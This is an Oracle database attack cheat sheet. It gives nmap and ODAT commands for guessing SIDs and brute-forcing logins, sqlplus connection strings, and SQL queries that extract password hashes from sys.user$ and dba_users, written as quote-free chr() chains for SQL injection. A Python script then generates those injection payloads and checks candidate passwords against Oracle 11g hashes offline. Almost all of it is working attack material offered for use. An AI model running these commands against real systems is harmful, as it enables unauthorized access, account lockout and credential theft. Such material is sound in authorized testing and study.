Oracle Database enumeration and exploitation

Initial enumeration

nmap -vv -p 1521 -sT -A --script '+oracle*' <ip>  # 1521 is the default listener port; the leading + forces the oracle-* NSE scripts to run against the port, and the glob is quoted so the shell does not expand it

Brute-forcing a way in

  • Guessing SIDs (instance names; a SID or service name is needed before any login attempt):
odat sidguesser -s <ip>
  • Brute-forcing both username and password (using ODAT's built-in account list; --both-ul also tries each credential in upper and lower case):
odat passwordguesser -s <ip> -d <sid> --both-ul
  • Brute-forcing the password of a known user (--accounts-files takes a logins file followed by a passwords file):
echo '<username>' > username.txt
odat passwordguesser -s <ip> -d <sid> --accounts-files $PWD/username.txt /usr/share/wordlists/rockyou.txt
  • Mind account lockout: the DEFAULT profile sets FAILED_LOGIN_ATTEMPTS to 10, so a wordlist run against one user will usually lock that account unless its profile is UNLIMITED.

Connecting to an Oracle database

  • Check which attack modules the account can use (odat all runs every module and reports what works):
odat all -s <ip> -d <sid> -U <username> -P '<password>'
odat all -s <ip> -d <sid> -U <username> -P '<password>' --sysdba # Privileged
  • Connect to a database (EZConnect expects a service name after the slash; the SID usually works as one, otherwise use a full TNS connect descriptor with (CONNECT_DATA=(SID=<sid>))):
sqlplus '<username>/<password>@<ip>:<port>/<sid>'
sqlplus '<username>/<password>@<ip>:<port>/<sid>' as sysdba # Privileged
  • Improve formatting:
SET LINESIZE 32000;

Enumerating a database

  • Get version:
SELECT banner FROM v$version;
SELECT version FROM v$instance;
  • Get current database:
SELECT name from v$database; 
  • Get current user:
SELECT user FROM DUAL; 
  • Get current user's roles (granted system privileges are listed in session_privs):
SELECT * FROM user_role_privs;
  • Get current user's password hash (reading dba_users or sys.user$ needs DBA-level access; dba_users.password is empty from 11g on, the 10g DES hash is in sys.user$.password and the 11g/12c hashes are in sys.user$.spare4):
SELECT password FROM dba_users WHERE username=(SELECT user FROM DUAL);
SELECT password, spare4 FROM sys.user$ WHERE name=(SELECT user FROM DUAL);
  • List all users (all_users is readable by every account but has no hash columns):
SELECT username FROM dba_users ORDER BY 1;
SELECT name FROM sys.user$ ORDER BY 1;
  • Get default users' password hashes, spelling the names as quote-free chr() chains for injection points that filter single quotes:
SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash
SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash
SELECT password FROM dba_users WHERE lower(username)=(chr(104)||chr(114)); -- Get "hr" user's password hash
SELECT password, spare4 FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash
SELECT password, spare4 FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash
SELECT password, spare4 FROM sys.user$ WHERE lower(name)=(chr(104)||chr(114)); -- Get "hr" user's password hash
  • List tables:
SELECT owner,table_name FROM all_tables ORDER BY 1;
  • List table columns (unquoted identifiers are stored in upper case, so match the name in upper case):
SELECT column_name FROM all_tab_columns WHERE table_name='<TABLE_NAME>' ORDER BY 1;
  • Search for tables whose name contains "user" (quote-free LIKE pattern, one row at a time):
SELECT owner,table_name FROM all_tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- the OFFSET/FETCH row-limiting clause needs 12.1+; on older releases wrap the query and filter on ROWNUM instead
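
The quote-free chr() chains and the version-dependent row-limiting clause above are tedious to write by hand, and a hash pulled out of sys.user$ is only useful once candidate passwords can be tested against it offline. The helpers below are an added example, not code from the original cheat sheet or from ODAT: every function name is my own, the salt and password in the demo are constructed, and only the 11g "S:" hash format (SHA-1 over the password bytes followed by the 10-byte salt, stored as hex) is implemented; the 10g DES hash and the 12c "T:" segment are not handled.

```python
"""Helpers for the Oracle enumeration queries above (added example, not part of the
original cheat sheet or of ODAT; function names are my own)."""
import hashlib
import re


def chr_literal(text: str) -> str:
    """Render an ASCII string as an Oracle chr()||chr() chain, usable where single
    quotes are filtered (for example an injection point inside a WHERE clause)."""
    if not text.isascii():
        raise ValueError("one chr() per character assumes an ASCII value")
    return "||".join(f"chr({ord(c)})" for c in text)


_CHAIN_RE = re.compile(r"^chr\(\d+\)(?:\|\|chr\(\d+\))*$")


def decode_chr_literal(expr: str) -> str:
    """Inverse of chr_literal, for reading a payload back out of logs or a proxy."""
    if not _CHAIN_RE.match(expr):
        raise ValueError(f"not a chr() chain: {expr!r}")
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", expr))


def hash_query(username: str, source: str = "sys.user$") -> str:
    """Quote-free query for a user's stored hashes. sys.user$ keeps the 10g DES hash
    in PASSWORD and the 11g/12c hashes in SPARE4; dba_users.password is empty on 11g+."""
    name = chr_literal(username.lower())
    if source == "sys.user$":
        return f"SELECT password,spare4 FROM sys.user$ WHERE lower(name)=({name})"
    if source == "dba_users":
        return f"SELECT password FROM dba_users WHERE lower(username)=({name})"
    raise ValueError(f"unknown source {source!r}")


def one_row(ordered_query: str, index: int, pre_12c: bool = False) -> str:
    """Fetch the index-th row (0-based) of a query that ends with its ORDER BY.
    12.1+ has the OFFSET/FETCH row-limiting clause; older releases need ROWNUM."""
    if index < 0:
        raise ValueError("index must be >= 0")
    if not pre_12c:
        return f"{ordered_query} OFFSET {index} ROWS FETCH NEXT 1 ROWS ONLY"
    n = index + 1  # ROWNUM is 1-based and must be bounded before the outer equality test
    return (f"SELECT * FROM (SELECT t.*, ROWNUM rn FROM ({ordered_query}) t "
            f"WHERE ROWNUM <= {n}) WHERE rn = {n}")


def oracle11_hash(password: str, salt: bytes) -> str:
    """Oracle 11g 'S:' hash as stored in sys.user$.spare4: 'S:' followed by
    SHA-1(password || salt) as 40 hex digits and the 10-byte salt as 20 hex digits."""
    if len(salt) != 10:
        raise ValueError("the 11g salt is 10 bytes")
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest()
    return f"S:{digest}{salt.hex()}".upper()


def check_oracle11(spare4: str, candidate: str) -> bool:
    """Offline test of a candidate password against a spare4 value. Only the S:
    segment is checked; the 12c 'T:' (PBKDF2) segment, if present, is ignored."""
    m = re.search(r"S:([0-9A-Fa-f]{40})([0-9A-Fa-f]{20})", spare4)
    if not m:
        raise ValueError("no S: segment in spare4 value")
    salt = bytes.fromhex(m.group(2))
    return oracle11_hash(candidate, salt) == f"S:{m.group(1)}{m.group(2)}".upper()


if __name__ == "__main__":
    for user in ("sys", "system", "hr"):
        print(hash_query(user))
    tables = ("SELECT owner,table_name FROM all_tables WHERE lower(table_name) LIKE "
              f"{chr_literal('%user%')} ORDER BY 1")
    print(one_row(tables, 0))
    print(one_row(tables, 0, pre_12c=True))
    # Constructed sample: a made-up salt and password, not taken from any real database.
    sample = oracle11_hash("Tiger123", bytes.fromhex("0102030405060708090a"))
    print(sample, check_oracle11(sample, "Tiger123"), check_oracle11(sample, "tiger123"))
```

hash_query reproduces the chr() spellings used in the queries above for any account name, and one_row gives the pre-12.1 ROWNUM form of the FETCH NEXT query when the target turns out to be an older release. check_oracle11 is only a sanity check for a handful of guesses; a full wordlist run belongs in hashcat or John against the same spare4 value.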